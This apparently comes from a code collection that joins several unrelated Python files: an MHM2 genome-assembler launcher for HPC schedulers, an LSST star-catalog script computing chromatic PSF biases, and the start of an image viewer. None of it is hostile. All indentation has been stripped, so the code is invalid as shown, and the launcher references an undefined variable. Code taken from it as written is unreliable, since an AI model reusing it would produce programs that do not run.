# SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
# You are under no obligation whatsoever to provide any bug fixes, patches, or upgrades
# to the features, functionality or performance of the source code ("Enhancements") to
# anyone; however, if you choose to make your Enhancements available either publicly,
# or directly to Lawrence Berkeley National Laboratory, without imposing a separate
# written license agreement for such Enhancements, then you hereby grant the following
# license: a non-exclusive, royalty-free perpetual license to install, use, modify,
# prepare derivative works, incorporate into other computer software, distribute, and
# sublicense such enhancements or derivative works thereof, in binary and source code
# form.
from __future__ import print_function
import signal
import subprocess
import sys
import os
import datetime
import time
import traceback
import argparse
import threading
import io
import string
import multiprocessing
import collections
SIGNAMES = ['SIGHUP', 'SIGINT', 'SIGQUIT', 'SIGILL', 'SIGTRAP', 'SIGABRT', 'SIGBUS', 'SIGFPE', 'SIGKILL', 'SIGUSR1',
'SIGSEGV', 'SIGUSR2', 'SIGPIPE', 'SIGALRM', 'SIGTERM', 'SIGSTKFLT', 'SIGCHLD', 'SIGCONT', 'SIGSTOP', 'SIGTSTP',
'SIGTTIN', 'SIGTTOU', 'SIGURG', 'SIGXCPU', 'SIGXFSZ', 'SIGVTALRM', 'SIGPROF', 'SIGWINCH', 'SIGIO', 'SIGPWR', 'SIGSYS']
_orig_sighdlr = None
_proc = None
_output_dir = ''
_err_thread = None
_stop_thread = False
def print_red(*args):
print("\033[91m", *args, sep='', end='', file=sys.stderr)
print("\033[00m", file=sys.stderr)
_defaultCores = None
def get_hdw_cores_per_node():
"""Query the hardware for physical cores"""
global _defaultCores
if _defaultCores is not None:
return _defaultCores
try:
import psutil
cores = psutil.cpu_count(logical=False)
print("Found %d cpus from psutil" % cores)
except (NameError, ImportError):
#print("Could not get cpus from psutil")
pass
# always trust lscpu, not psutil
# NOTE some versions of psutil has bugs and comes up with the *WRONG* physical cores
if True:
import platform
cpus = multiprocessing.cpu_count()
hyperthreads = 1
if platform.system() == 'Darwin':
for line in os.popen('sysctl -n hw.physicalcpu').readlines():
hyperthreads = cpus / int(line)
print("Found %d cpus and %d hyperthreads from sysctl" % (cpus, hyperthreads))
else:
for line in os.popen('lscpu').readlines():
if line.startswith('Thread(s) per core'):
hyperthreads = int(line.split()[3])
print("Found %d cpus and %d hyperthreads from lscpu" % (cpus, hyperthreads))
cores = int(cpus / hyperthreads)
_defaultCores = cores
return cores
def get_job_id():
"""Query the environment for a job"""
for key in ['PBS_JOBID', 'SLURM_JOBID', 'LSB_JOBID', 'JOB_ID', 'COBALT_JOBID', 'LOAD_STEP_ID', 'LBS_JOBID']:
if key in os.environ:
return os.environ.get(key)
return str(os.getpid())
def get_job_name():
"""Query the env for the name of a job"""
for key in ['PBS_JOBNAME', 'JOBNAME', 'SLURM_JOB_NAME', 'LSB_JOBNAME', 'JOB_NAME', 'LSB_JOBNAME']:
if key in os.environ:
return os.environ.get(key)
return ""
def is_cobalt_job():
return os.environ.get('COBALT_JOBID') is not None
def is_slurm_job():
return os.environ.get('SLURM_JOB_ID') is not None
def is_pbs_job():
return os.environ.get('PBS_JOBID') is not None
def is_lsb_job():
return os.environ.get('LSB_JOBID') is not None
def is_ge_job():
return os.environ.get('JOB_ID') is not None
def is_ll_job():
return os.environ.get('LOAD_STEP_ID') is not None
def get_slurm_cores_per_node(defaultCores = 0):
# Only trust this environment variable from slurm, otherwise trust the hardware
if defaultCores == 0:
defaultCores = get_hdw_cores_per_node()
ntasks_per_node = os.environ.get('SLURM_NTASKS_PER_NODE')
if ntasks_per_node:
print("Found tasks per node from SLURM_NTASKS_PER_NODE=", ntasks_per_node)
return int(ntasks_per_node)
# This SLURM variable defaults to all the hyperthreads if not overriden by the sbatch option --ntasks-per-node
ntasks_per_node = os.environ.get('SLURM_TASKS_PER_NODE') # SLURM_TASKS_PER_NODE=32(x4)
if ntasks_per_node:
if ntasks_per_node.find('(') > 0:
ntasks_per_node = int(ntasks_per_node[:ntasks_per_node.find('(')])
else:
ntasks_per_node = int(ntasks_per_node)
if ntasks_per_node <= defaultCores:
print("Detected slurm job restricts cores to ", ntasks_per_node, " because of SLURM_TASKS_PER_NODE=", os.environ.get('SLURM_TASKS_PER_NODE'))
return ntasks_per_node
print("Using default cores of ", defaultCores, ". Ignoring tasks per node ", ntasks_per_node, " from SLURM_TASKS_PER_NODE=", os.environ.get('SLURM_TASKS_PER_NODE'))
return defaultCores
def get_cobalt_cores_per_node():
ntasks_per_node = os.environ.get('COBALT_PARTCORES')
return int(ntasks_per_node)
def get_lsb_cores_per_node():
# LSB_MCPU_HOSTS=batch2 1 h22n07 42 h22n08 42
lsb_mcpu = os.environ.get('LSB_MCPU_HOSTS')
host_core = lsb_mcpu.split()
return int(host_core[-1])
def get_job_cores_per_node(defaultCores = 0):
"""Query the job environment for the number of cores per node to use, if available"""
if defaultCores == 0:
defaultCores = get_hdw_cores_per_node()
if 'GASNET_PSHM_NODES' in os.environ:
print("Detected procs_per_node from GASNET_PSHM_NODES=",os.getenv('GASNET_PSHM_NODES'))
return int(os.getenv('GASNET_PSHM_NODES'))
ntasks_per_node = None
if is_slurm_job():
ntasks_per_node = get_slurm_cores_per_node(defaultCores)
if is_lsb_job():
ntasks_per_node = get_lsb_cores_per_node()
if is_cobalt_job():
ntasks_per_node = get_cobalt_cores_per_node()
if ntasks_per_node is not None:
return ntasks_per_node
return defaultCores
def get_slurm_job_nodes():
"""Query the SLURM job environment for the number of nodes"""
nodes = os.environ.get('SLURM_JOB_NUM_NODES')
if nodes is None:
nodes = os.environ.get('SLURM_NNODES')
if nodes:
return int(nodes)
print("Warning: could not determine the number of nodes in this SLURM job (%d). Only using 1" % (get_job_id()))
return 1
def get_lsb_job_nodes():
"""Query the LFS job environment for the number of nodes"""
# LSB_MCPU_HOSTS=batch2 1 h22n07 42 h22n08 42
nodes = os.environ.get('LSB_MCPU_HOSTS')
if nodes:
return int( (len(nodes.split()) - 2) / 2)
print("Warning: could not determine the number of nodes in this LSF job (%s). Only using 1" % (get_job_id()))
return 1
def get_pbs_job_nodes():
"""Query the PBS job environment for the number of nodes"""
nodesfile = os.environ.get('PBS_NODEFILE')
if nodesfile is not None:
nodes = 0
with open(nodesfile, 'r') as f:
for line in f:
nodes += 1
return nodes
print("Warning: could not determine the number of nodes in this PBS job (%d). Only using 1" % (get_job_id()))
return 1
def get_ge_job_nodes():
"""Query the Grid Engine job environment for the number of nodes"""
nodes = os.environ.get("NHOSTS")
if nodes is not None:
return int(nodes)
print("Warning: could not determine the number of nodes in this SGE job (%d). Only using 1" % (get_job_id()))
return 1
def get_cobalt_job_nodes():
"""Query the COBALT job environment for the number of nodes"""
nodes = os.environ.get("COBALT_JOBSIZE")
if nodes is not None:
return int(nodes)
print("Warning: could not determine the number of nodes in this COBALT job (%s). Only using 1" % (get_job_id()))
return 1
def get_job_nodes():
"""Query the job environment for the number of nodes"""
if is_slurm_job():
return get_slurm_job_nodes()
if is_lsb_job():
return get_lsb_job_nodes()
if is_pbs_job():
return get_pbs_job_nodes()
if is_ge_job():
return get_ge_job_nodes()
if is_cobalt_job():
return get_cobalt_job_nodes()
print("Warning: could not determine the number of nodes in this unsupported scheduler job (%s). Only using 1" % (get_job_id()))
return 1
def get_job_desc():
job_name = get_job_name()
if job_name == "":
return "PID " + get_job_id()
return "job " + get_job_id() + " (" + job_name + ")"
def which(file_name):
if os.path.exists(file_name) and os.access(file_name, os.X_OK):
return file_name
for path in os.environ["PATH"].split(os.pathsep):
full_path = os.path.join(path, file_name)
if os.path.exists(full_path) and os.access(full_path, os.X_OK):
return full_path
return None
def handle_interrupt(signum, frame):
global _orig_sighdlr
global _stop_thread
print_red('\n\nInterrupt received, signal', signum)
_stop_thread = True
signal.signal(signal.SIGINT, _orig_sighdlr)
exit_all(1)
def exit_all(status):
global _proc
if _proc:
#os.kill(_proc.pid, signal.SIGINT)
try:
_proc.terminate()
except OSError:
pass
#print("Process ", _proc, " is already terminated\n")
sys.exit(status)
def die(*args):
print_red('\nFATAL ERROR: ', *args)
sys.stdout.flush()
sys.stderr.flush()
exit_all(1)
def check_exec(cmd, args, expected):
test_exec = which(cmd)
if not test_exec:
die('Cannot find ', cmd)
try:
result = subprocess.check_output([test_exec, args]).decode()
if expected not in result:
die(test_exec, ' failed to execute')
except subprocess.CalledProcessError as err:
die('Could not execute ', test_exec +': ', err)
def capture_err(err_msgs):
global _proc
global _stop_thread
for line in iter(_proc.stderr.readline, b''):
try:
line = line.decode()
except:
print("WARNING could not decode binary output: ", line)
pass
# filter out all but warnings
# errors causing crashes will come to light later
if 'WARNING' in line:
if 'GASNet was configured without multi-rail support' not in line and 'GASNET_AM_CREDITS_SLACK reduced to GASNET_AM_CREDITS_PP' not in line:
sys.stderr.write(line)
sys.stderr.flush()
# FIXME: check for messages about memory failures
if 'UPC++ could not allocate' in line:
print_red('ERROR: UPC++ memory allocation failure')
err_msgs.append(line)
if _stop_thread:
return
_proc.wait()
def check_err_msgs(err_msgs):
warnings = []
errors = []
for msg in err_msgs:
msg = msg.strip()
if 'WARNING' in msg:
warnings.append(msg)
elif msg[:2] == '+ ':
# this is 'set -x' console echo of a command
pass
elif 'GASNet reporting enabled' in msg:
# this is just info
pass
elif msg != '':
errors.append(msg)
if len(warnings) > 0:
print('There were', len(warnings), 'warnings:', file=sys.stderr)
for warning in list(collections.OrderedDict.fromkeys(warnings)):
sys.stderr.write(warning + '\n')
if len(errors) > 0:
print('There were', len(errors), 'errors:', file=sys.stderr)
print_sigint = False
for err in errors:
if 'SIGINT(2)' in err and print_sigint:
continue
print_sigint = True
sys.stderr.write(err + '\n')
return len(errors) + len(warnings)
def print_err_msgs(err_msgs, return_status):
global _output_dir
num_problems = check_err_msgs(err_msgs)
err_msgs.append('==============================================')
if len(_output_dir) == 0:
_output_dir = os.getcwd() + "/"
# we have not yet entered the output directory, so this is a failure of the command line
# and we need to dump all the error messages to the console
print_red("No output dir was created yet")
for msg in err_msgs:
print(msg)
sys.exit(return_status)
else:
if _output_dir[0] != '/':
_output_dir = os.getcwd() + "/" + _output_dir
suspect_oom = None
if return_status != 0:
if return_status == 9: # SIGKILL
suspect_oom = "Got SIGKILLed"
err_msgs.append("Return status: %d\n" % (return_status))
print_red("MHM2 failed")
# keep track of all msg copies so we don't print duplicates
seen_msgs = {}
per_rank_dir = _output_dir + 'per_rank/'
if not os.path.exists(per_rank_dir):
per_rank_dir = _output_dir
err_log = per_rank_dir + 'err.log'
with open(err_log, 'a') as f:
for msg in err_msgs:
clean_msg = msg.strip()
#clean_msg = re.sub('\(proc .+\)', '(proc XX)', msg.strip())
if clean_msg not in seen_msgs:
f.write(clean_msg + '\n')
f.flush()
seen_msgs[clean_msg] = True
if 'SIGBUS' in clean_msg or 'bound CqGetEvent GNI_RC_TRANSACTION_ERROR' in clean_msg or 'oom-kill' in clean_msg or 'bad_alloc' in clean_msg or 'SIGKILL' in clean_msg \
or 'Cannot allocate memory' in clean_msg or 'mmap failed' in clean_msg:
suspect_oom = clean_msg
if suspect_oom is not None:
f.write("Out of memory is suspected because of: %s\n" %(suspect_oom))
print_red("Out of memory is suspected based on the errors in err.log such as: ", suspect_oom, "\n")
if per_rank_dir != _output_dir:
new_err_log = _output_dir + "err.log"
if os.path.exists(new_err_log):
os.unlink(new_err_log)
os.link(err_log, new_err_log)
err_log = new_err_log
if num_problems > 0:
print_red("Check " + err_log + " for details")
def main():
global _orig_sighdlr
global _proc
global _output_dir
global _err_thread
start_time = time.time()
_orig_sighdlr = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, handle_interrupt)
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument("--auto-resume", action="store_true", help="Automatically resume after a failure")
argparser.add_argument("--shared-heap", default="10%", help="Shared heap as a percentage of memory")
#argparser.add_argument("--procs-per-node", default=0, help="Processes to spawn per node (default auto-detect cores)")
argparser.add_argument("--procs", default=0, type=int, help="Total numer of processes")
argparser.add_argument("--trace-dir", default=None, help="Output directory for stacktrace")
argparser.add_argument("--stats-dir", default=None, help="Output directory for stacktrace")
argparser.add_argument("--preproc", default=None, help="Comma separated preprocesses and options like (valgrind,--leak-check=full) or options to upcxx-run before binary")
options, unknown_options = argparser.parse_known_args()
if options.auto_resume:
print("--auto-resume is enabled: will try to restart if run fails")
check_exec('upcxx-run', '-h', 'UPC++')
# expect mhm2 to be in same directory as mhm2.py
mhm2_binary_path = os.path.split(sys.argv[0])[0] + '/mhm2'
if not (os.path.exists(mhm2_binary_path) or which(mhm2_binary_path)):
die("Cannot find binary mhm2 in '", mhm2_binary_path, "'")
#cores_per_node = int(options.procs_per_node)
#if cores_per_node == 0:
# cores_per_node = get_job_cores_per_node()
num_nodes = get_job_nodes()
if options.procs == 0:
options.procs = num_nodes * get_job_cores_per_node()
cmd = ['upcxx-run', '-n', str(options.procs), '-N', str(num_nodes)]
# special spawner for summit -- executes jsrun and picks up job size from the environment!
if 'LMOD_SYSTEM_NAME' in os.environ and os.environ['LMOD_SYSTEM_NAME'] == "summit":
print("This is Summit - executing custom script mhm2-upcxx-run-summit to spawn the job")
# expect mhm2-upcxx-run-summit to be in same directory as mhm2.py too
cmd = [mhm2_binary_path + "-upcxx-run-summit"]
if 'UPCXX_RUN_SUMMIT_OPTS' in os.environ:
cmd.extend(os.environ['UPCXX_RUN_SUMMIT_OPTS'].split())
if 'UPCXX_SHARED_HEAP_SIZE' not in os.environ:
cmd.extend(['-shared-heap', options.shared_heap]) # both upcxx-run and upcxx-run-summit support this
if options.preproc:
print("Executing preprocess options: ", options.preproc)
pplist = options.preproc.split(',')
cmd.extend(pplist)
cmd.extend(['--', mhm2_binary_path])
cmd.extend(unknown_options)
print("Executing mhm2 with " + get_job_desc() + " on " + str(num_nodes) + " nodes.")
print("Executing as: " + " ".join(sys.argv))
cores = get_job_cores_per_node()
noderanks = '0'
halfnoderanks = '0,%d' % (cores/2)
for n in range(1, num_nodes):
noderanks += ',' + str(n*cores)
halfnoderanks += ',' + str(n*cores) + ',' + str(n*cores+cores/2)
# set extra GASNET environments from build and/or options to mhm2.py
runtime_vars = """@MHM2PY_RUNTIME_ENV@"""
if runtime_vars == '@MHM2PY_RUNTIME' + '_ENV@':
runtime_vars = ''
runtime_output_vars = ''
if options.stats_dir is not None:
if not os.path.isdir(options.stats_dir):
os.mkdir(options.stats_dir)
runtime_vars += ' GASNET_STATSFILE="%s/stats.%%", ' % (os.path.realpath(options.stats_dir))
runtime_vars += runtime_output_vars
if os.environ.get("GASNET_STATSNODES") is None:
runtime_vars += ' GASNET_STATSNODES="%s", ' % noderanks
if options.trace_dir is not None:
if not os.path.isdir(options.trace_dir):
os.mkdir(options.trace_dir)
runtime_vars += ' GASNET_TRACEFILE="%s/trace.%%", ' % (os.path.realpath(options.trace_dir))
if os.environ.get("GASNET_TRACENODES") is None:
runtime_vars += ' GASNET_TRACENODES="%s", ' % halfnoderanks
if os.environ.get("GASNET_TRACEMASK") is None:
runtime_vars += ' GASNET_TRACEMASK="GPWBNIH", ' # some of the more useful and less verbose trace options
# it appears that this GASNET_COLL_SCRATCH_SIZE is still needed
print("Setting GASNET_COLL_SCRATCH_SIZE=4M", runtime_vars)
runenv = eval('dict(os.environ, GASNET_COLL_SCRATCH_SIZE="4M", %s MHM2_RUNTIME_PLACEHOLDER="")' % (runtime_vars))
#print("Runtime environment: ", runenv)
mhm2_lib_path = os.path.split(sys.argv[0])[0] + '/../lib'
if not os.path.exists(mhm2_lib_path):
die("Cannot find mhm2 lib install in '", mhm2_lib_path, "'")
# This should no longer be necessary with the static GPU build fixes of df8cc23, leaving here in case problems reoccur
#if which('nvcc'):
# # FIXME: this ugly hack is because we need to load a shared library on Cori GPU nodes,
# # which can't be done with the craype environment. Not needed anywhere else :(
# # The intel library path is only needed for the intel compiler. Sigh.
# runenv['LD_LIBRARY_PATH'] = mhm2_lib_path + ':/usr/lib64/slurmpmi/:/opt/intel/compilers_and_libraries_2019.3.199/linux/compiler/lib/intel64_lin/'
# print('Setting LD_LIBRARY_PATH=' + runenv['LD_LIBRARY_PATH'])
restarting = False
err_msgs = []
while True:
print(str(datetime.datetime.now()) + ' ' + 'executing:\n', ' '.join(cmd))
started_exec = False
completed_round = False
try:
_proc = subprocess.Popen(cmd, env=runenv, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# thread captures the error stream
_err_thread = threading.Thread(target=capture_err, args=(err_msgs,))
_err_thread.start()
for line in iter(_proc.stdout.readline, b''):
if not started_exec:
print('Started executing at ' + str(datetime.datetime.now()) + ' with PID ' + str(_proc.pid))
started_exec = True
try:
line = line.decode()
except:
print("WARNING could not decode binary output: ", line)
pass
sys.stdout.write(line)
sys.stdout.flush()
if len(_output_dir) == 0 and (' output = ' in line or 'Using output dir: ' in line):
_output_dir = line.split()[3]
onlyascii = ''.join([s for s in _output_dir if ord(s) < 127 and ord(s) >= 32])
_output_dir = onlyascii
if _output_dir.endswith('[0m'):
_output_dir = _output_dir[:-3]
if _output_dir[-1] != '/':
_output_dir += '/'
# get rid of any leftover error logs if not restarting
try:
# always rename the error log if it already exists
new_err_log = _output_dir + 'err.log-' + str(datetime.datetime.now().isoformat())
os.rename(_output_dir + 'err.log', new_err_log)
print("Renamed old err.log to ", new_err_log)
os.unlink(_output_dir + '/per_rank/err.log')
except:
pass
if 'Completed ' in line and 'initialization' not in line:
completed_round = True
_err_thread.join()
if _proc.returncode < 0:
_proc.returncode *= -1
if _proc.returncode not in [0, 15] or not status:
signame = ''
if _proc.returncode <= len(SIGNAMES) and _proc.returncode > 0:
signame = ' (' + SIGNAMES[_proc.returncode - 1] + ')'
if _proc.returncode == 127:
# 127 is the return code from the CLI parser, so we don't want to print this
found_error = False
for msg in err_msgs:
if msg.startswith('Error'):
print(msg, end='')
found_error = True
elif msg.startswith('INI was not able to parse'):
print(" Unable to parse entry '" + msg.split()[-1] + "' in the config file")
else:
print(" ", msg, end='')
if found_error:
return 127
else:
return 0
print_red("\nERROR: subprocess terminated with return code ", _proc.returncode)
signals_found = {}
for err_msg in err_msgs:
for signame in SIGNAMES:
if signame in err_msg:
if not signame in signals_found:
signals_found[signame] = 0
signals_found[signame] += 1
for signame in SIGNAMES:
if signame in signals_found:
print_red(" Found ", signals_found[signame], " occurences of ", signame)
got_signal = signame
#err_msgs.append("ERROR: subprocess terminated with return code " + str(_proc.returncode) + " " + signame)
print_err_msgs(err_msgs, _proc.returncode)
if completed_round and options.auto_resume:
print_red('Trying to restart with output directory ', _output_dir)
restarting = True
err_msgs = []
cmd.append('--restart')
if _output_dir[:-1] not in cmd:
cmd.extend(['-o', _output_dir])
time.sleep(5)
else:
if options.auto_resume:
print_red("No additional completed round. Could not restart, exiting...")
return signal.SIGABRT
else:
final_assembly = _output_dir + "final_assembly.fasta"
if os.path.exists(final_assembly):
print("Final assembly can be found at ", final_assembly)
else:
err_msgs.append("Could not find the final assembly! It should be at %s\n" % (final_assembly))
print_err_msgs(err_msgs, _proc.returncode)
print('Overall time taken (including any restarts): %.2f s' % (time.time() - start_time))
break
except:
print_red("Got an exception")
traceback.print_tb(sys.exc_info()[2], limit=100)
print_err_msgs(err_msgs, -1)
if _proc:
try:
print_red("\nTerminating subprocess after exception: ", sys.exc_info(), "\n")
traceback.print_tb(sys.exc_info()[2], limit=100)
_proc.terminate()
except OSError:
pass
except:
print_red("\nUnexpected error in forced termination of subprocess: ", sys.exc_info())
traceback.print_tb(sys.exc_info()[2], limit=100)
raise
raise
return 0
if __name__ == "__main__":
status = 1
try:
status = main()
except SystemExit:
if status != 127:
raise
except:
e = sys.exc_info()[0]
print_red("\n", "\nCaught an exception %s in mhm2.py!\n\n" % e)
traceback.print_exc(file=sys.stderr)
finally:
exit_all(status)
|
process_star_catalog.py
|
"""Process star catalog produced by make_catalogs.py to add columns for DCR biases, chromatic
seeing biases, and chromatic diffraction limit biases. This script requires that the LSST CatSim
SED files are downloaded and that either the environment variable $CAT_SHARE_DATA (for older versions
of the LSST DM stack) or SIMS_SED_LIBRARY_DIR (for the current version of the stack) points to them.
Note that you might need to source the `loadLSST.sh` file and run `setup sims_sed_library` to get
these paths to work for the current version of the lsst stack.
Chromatic biases include:
Rbar - zenith-direction centroid shift due to differential chromatic refraction.
V - zenith-direction second moment shift due to differential chromatic refraction
S - change in "size" of the PSF due to a power-law dependence of the FWHM with wavelength:
FWHM \propto \lambda^{\alpha}. S = the second moment square radius r^2 = Ixx + Iyy.
Three cases are tabulated:
\alpha = -0.2 : appropriate for atmospheric chromatic seeing. denoted 'S_m02'
\alpha = 1.0 : appropriate for a pure diffraction limited PSF. denoted 'S_p10'
\alpha = 0.6 : appropriate for Euclid (see Voigt+12 or Cypriano+10). denoted 'S_p06'
"""
import sys
import os
import cPickle
from argparse import ArgumentParser
import numpy as np
from scipy.interpolate import interp1d
import galsim
import _mypath
import chroma
import chroma.lsstetc
from multiprocessing import Process, Queue
# Exposure Time Calculator for magnitude error estimates
psf = galsim.Kolmogorov(fwhm = 0.67)
etc = {f:chroma.lsstetc.ETC(f) for f in 'ugrizy'}
datadir = '../../../data/'
if 'CAT_SHARE_DATA' in os.environ:
SED_dir = os.environ['CAT_SHARE_DATA'] + 'data'
elif 'SIMS_SED_LIBRARY_DIR' in os.environ:
SED_dir = os.environ['SIMS_SED_LIBRARY_DIR']
else:
raise ValueError("Cannot find CatSim SED files.")
# Assemble dictionary of all filters used below
filters = {}
for f in 'ugrizy':
ffile = datadir+'filters/LSST_{}.dat'.format(f)
filters['LSST_{}'.format(f)] = (galsim.Bandpass(ffile)
.thin(1.e-5) # thin for speed
.withZeropoint('AB',
effective_diameter=6.4,
exptime=30.0))
for width in [150,250,350,450]:
ffile = datadir+'filters/Euclid_{}.dat'.format(width)
filters['Euclid_{}'.format(width)] = (galsim.Bandpass(ffile)
.thin(1.e-5)
.withZeropoint('AB',
effective_diameter=6.4, # huh?
exptime=30.0))
for f in 'ugriz':
ffile = datadir+'filters/SDSS_{}.dat'.format(f)
filters['SDSS_{}'.format(f)] = (galsim.Bandpass(ffile)
.withZeropoint('AB',
effective_diameter=6.4, # huh?
exptime=30.0))
# Cheat a little bit here. The SDSS_u filter is defined down to 298 nm, but some of the
# stellar spectra only start at 300 nm. So we shift the blue limit of the filter a bit.
filters['SDSS_u'] = (filters['SDSS_u'].truncate(blue_limit=300.0)
.withZeropoint('AB', effective_diameter=6.4, exptime=30.0))
# LSST SED catalog entries are normalized by their AB magnitude at 500 nm. So define a narrow
# filter at 500nm to use for normalization.
filters['norm'] = (galsim.Bandpass(galsim.LookupTable([499, 500, 501], [0, 1, 0]))
.withZeropoint('AB', effective_diameter=6.4, exptime=30.0))
# Define some useful np dtypes
Lbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float)]
Ebands = [('Euclid_150', np.float),
('Euclid_250', np.float),
('Euclid_350', np.float),
('Euclid_450', np.float)]
LSbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float),
('SDSS_u', np.float),
('SDSS_g', np.float),
('SDSS_r', np.float),
('SDSS_i', np.float),
('SDSS_z', np.float)]
LEbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float),
('Euclid_150', np.float),
('Euclid_250', np.float),
('Euclid_350', np.float),
('Euclid_450', np.float)]
LSEbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float),
('SDSS_u', np.float),
('SDSS_g', np.float),
('SDSS_r', np.float),
('SDSS_i', np.float),
('SDSS_z', np.float),
('Euclid_150', np.float),
('Euclid_250', np.float),
('Euclid_350', np.float),
('Euclid_450', np.float)]
dbtype = [('objectID', np.int64),
('raJ2000', np.float),
('decJ2000', np.float),
('magNorm', np.float),
('sedFilePath', np.str_, 64),
('galacticAv', np.float),
('mag', Lbands), # only LSST since read straight from CatSim
('magCalc', LSEbands),
('magErr', LSEbands),
('Rbar', LSbands), # doesn't make sense for space mission
('V', LSbands),
('S_m02', LSbands),
('S_p06', Ebands),
('S_p10', Ebands)]
def worker(inqueue, outqueue):
for j, s, debug in iter(inqueue.get, 'STOP'):
result = process_one_star(s, debug)
outqueue.put((j, result))
def process_one_star(s, debug):
d = np.recarray((1,), dtype=dbtype)
d.fill(np.nan)
# position
d.objectID = int(s[0])
d.raJ2000 = float(s[1])
d.decJ2000 = float(s[2])
# flux
d.magNorm = float(s[3])
d.sedFilePath = s[10]
d.galacticAv = float(s[11])
spec = stellar_spectrum(d, filters['norm'])
# loop through filters and fill in database columns
for k, f in enumerate('ugrizy'):
# also append magnitude from catalog as a sanity check
d['mag']['LSST_'+f] = float(s[4+k])
bp = filters['LSST_'+f] # for brevity
try:
d['magCalc']['LSST_'+f] = spec.calculateMagnitude(bp)
dcr = spec.calculateDCRMomentShifts(bp, zenith_angle=np.pi/4)
d['Rbar']['LSST_'+f] = dcr[0][1,0]
d['V']['LSST_'+f] = dcr[1][1,1]
d['S_m02']['LSST_'+f] = spec.calculateSeeingMomentRatio(bp)
d['magErr']['LSST_'+f] = etc[f].err(psf, d['magCalc']['LSST_'+f][0])
except:
pass
# separate loop for Euclid filters
for fw in [150, 250, 350, 450]:
fname = 'Euclid_{}'.format(fw)
bp = filters[fname]
try:
d['magCalc'][fname] = spec.calculateMagnitude(bp)
d['S_p06'][fname] = spec.calculateSeeingMomentRatio(bp, alpha=0.6)
d['S_p10'][fname] = spec.calculateSeeingMomentRatio(bp, alpha=1.0)
except:
pass
# separate loop for SDSS filters
for f in 'ugriz':
fname = 'SDSS_{}'.format(f)
bp = filters[fname]
try:
d['magCalc'][fname] = spec.calculateMagnitude(bp)
dcr = spec.calculateDCRMomentShifts(bp, zenith_angle=np.pi/4)
d['Rbar'][fname] = dcr[0][1,0]
d['V'][fname] = dcr[1][1,1]
d['S_m02'][fname] = spec.calculateSeeingMomentRatio(bp)
except:
pass
if debug:
print
print 'syn mag:' + ' '.join(['{:6.3f}'.format(
d['magCalc']['LSST_'+fname][0])
for fname in 'ugrizy'])
print 'syn err:' + ' '.join(['{:6.3f}'.format(
d['magErr']['LSST_'+fname][0])
for fname in 'ugrizy'])
print 'cat mag:' + ' '.join(['{:6.3f}'.format(d['mag']['LSST_'+fname][0])
for fname in 'ugrizy'])
print 'SDSS: ' + ' '.join(['{:6.3f}'.format(d['magCalc']['SDSS_'+fname][0])
for fname in 'ugriz'])
print 'Euclid: ' + ' '.join(['{:6.3f}'.format(
d['magCalc']['Euclid_{}'.format(fw)][0])
for fw in [150, 250, 350, 450]])
return d
def file_len(fname):
"""Count '\n's in file.
"""
with open(fname) as f:
for i, l in enumerate(f):
pass
return i + 1
def stellar_spectrum(star, norm_bandpass):
sed = chroma.SED(os.path.join(SED_dir, star['sedFilePath'][0]))
sed = sed.withMagnitude(star['magNorm'][0], norm_bandpass)
# Limit the range to that which can be reddened.
sed.blue_limit = max([91, sed.blue_limit])
sed.red_limit = min([6000, sed.red_limit])
sed = sed.redden(A_v=star['galacticAv'][0])
return sed
def process_star_file(filename, nmax=None, debug=False, seed=None, start=0):
nrows = file_len(filename)
if nmax is None:
nmax = nrows-1
if nmax > (nrows-1):
nmax = nrows-1
# Define the output compound dtype
data = np.recarray((nmax,), dtype = dbtype)
data[:] = np.nan
# Do randomization of the rows if requested
order = range(1, nrows+1)
if seed is not None:
import random
random.seed(seed)
random.shuffle(order)
order = order[start:start+nmax]
order.sort()
# Setup the multiprocessing
nthreads = 8
task_queue = Queue()
results_queue = Queue()
for i in range(nthreads):
Process(target=worker, args=(task_queue, results_queue)).start()
with open(filename) as f:
if not debug:
outdev = sys.stdout
else:
outdev = open(os.devnull, 'w')
j = 0
for i, line in enumerate(f):
if i == 0 : continue # ignore column labels row
if j >= nmax : break
if order[j] != i : continue
s = line.split(', ')
#data[j] = process_one_star(s, debug)
task_queue.put((j, s, debug))
j += 1
with chroma.ProgressBar(nmax, file=outdev) as bar:
for i in range(nmax):
bar.update()
j, result = results_queue.get()
data[j] = result
for i in range(nthreads):
task_queue.put('STOP')
return data
def runme():
junk = process_star_file('output/star_catalog.dat', nmax=25, debug=True)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--nmax', type=int, default=30000,
help="maximum number of stars to process (default: 30000)")
parser.add_argument('--seed', type=int, default=None,
help="randomize order of stars in catalog")
parser.add_argument('--outfile', default = 'output/star_data.pkl',
help="output filename (Default: output/star_data.pkl)")
parser.add_argument('--infile', default = 'output/star_catalog.dat',
help="input filename (Default: output/star_catalog.dat)")
parser.add_argument('--debug', action='store_true')
args = parser.parse_args()
cPickle.dump(process_star_file(args.infile, nmax=args.nmax,
debug=args.debug, seed=args.seed),
open(args.outfile, 'wb'))
|
mod_view.py
|
# -*- mode: python; coding: utf-8; indent-tabs-mode: nil; python-indent: 2 -*-
#
# $Id$
"""Interactive image viewer for CSPad images
XXX Known issues, wishlist:
* Is it slow? Yes!
